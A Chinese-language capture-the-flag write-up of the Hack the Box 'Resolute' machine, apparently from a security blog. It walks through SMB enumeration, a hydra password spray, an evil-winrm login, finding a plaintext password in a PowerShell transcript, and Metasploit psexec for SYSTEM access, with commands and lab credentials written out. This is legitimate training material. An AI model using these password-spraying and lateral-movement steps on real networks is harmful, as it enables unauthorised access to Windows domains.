Hack the Box – Resolute靶机

举报
Khan安全团队 发表于 2023/05/15 20:33:53 2023/05/15
【摘要】 Hack the Box – Resolute靶机
学习笔记

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Resolute”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试能力和黑盒测试能力,平台上有很多镜片,从易到难,各个等级的骨骼都有。本级骨骼难为中等等级,任务是找到骨骼上的user.txt和root.txt。


信息收集


        连接ovpn,获取内网IP,先使用nmap对目标主机扫一遍,进行信息收集,获取开放的端口和服务。

 

图片


l 探测开端口与服务

 

图片


l 发现端口88、135、139、389、445、3268等一些存在的端口。

l 其中445端口使用的是smb服务。

l 再次利用enum4linux扫描(enum4linux可用于枚举Windows和Samba主机中的数据),获得有价值的信息。

 

图片




爆破连接


l 使用smbclient连接marko,连接失败

 

图片


l 猜想:虽然无法正常连接,但也许可以进入用户名爆破。使用enumlinux4扫描出的用户名组成正文本account,使用密码Welcome 123!,结合hydra工具爆出用户名。

 

图片

图片


hydra -L /home/resolute/account.txt -p Welcome123! 10.10.10.169 smb


l 结果显示存在于用户名melanie可登录,利用smbclient进入登录。

 

[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!

 

图片

 

l 再次使用smbclient工具,尝试使用账号melanie,密码Welcome123!进行连接。

 

图片


l 接下来试试使用melanie账号,利用evil-winrm(一款可用于黑客攻击/透测的Windows远程管理(WinRM) Shell工具)进行登录

 

ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169 root@kali:/home/resolute/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169Evil-WinRM shell v2.1 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users*Evil-WinRM* PS C:\Users> ls     Directory: C:\Users    Mode                LastWriteTime         Length Name----                -------------         ------ ----d-----        9/25/2019  10:43 AM                Administratord-----        12/4/2019   2:46 AM                melanied-r---       11/20/2016   6:39 PM                Publicd-----        1/18/2020   3:28 AM                ryan


 

l 获得用户权限,并发现ryan用户

 

提权

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups                                                                                                                                                                                                                                                                                    GROUP INFORMATION                                                                                                                                                     -----------------                                                                                                                                                                                                                                                                                                                           Group Name                                 Type             SID          Attributes                                                                                   ========================================== ================ ============ ==================================================                                           Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                           BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group                                           BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                           BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group                                           NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group                                           NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                           NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group


 

l 成功登录

l 浏览C盘所有文件(包括隐藏文件),查看能否获取敏感信息。 

*Evil-WinRM* PS C:\> ls -hidden     Directory: C:\ Mode                LastWriteTime         Length Name----                -------------         ------ ----d--hs-        12/3/2019   6:40 AM                $RECYCLE.BINd--hsl        9/25/2019  10:17 AM                Documents and Settingsd--h--        9/25/2019  10:48 AM                ProgramDatad--h--        12/3/2019   6:32 AM                PSTranscriptsd--hs-        9/25/2019  10:17 AM                Recoveryd--hs-        9/25/2019   6:25 AM                System Volume Information-arhs-       11/20/2016   5:59 PM         389408 bootmgr-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT-a-hs-        1/17/2020   5:52 PM      402653184 pagefile.sys


 

l 进入PSTranscripts文件夹中,发现日志文件20191203063201.txt,打开日志文件

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden      Directory: C:\PSTranscripts\20191203  Mode                LastWriteTime         Length Name----                -------------         ------ -----arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt  PS>CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

 

l 得到rayn的密码Serv3r4Admin4cc123!

l 使用模块msf的psexec_psh,配置好目标IP,使用用户名、密码,开始使用。

 

图片


l 成功获得系统权限

 

图片

 

总结:

1、信息收集过程中要利用好每个信息,尝试找到突破口(smb服务)。

2、 熟练使用工具enum4linux、evil-winrm、msf等工具,提高效率。

3、应多试,从多方面入手,找不到密码可以从账号入手等。

4、要加强学习,增加对漏洞的认识与利用,才能断断续续。

【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。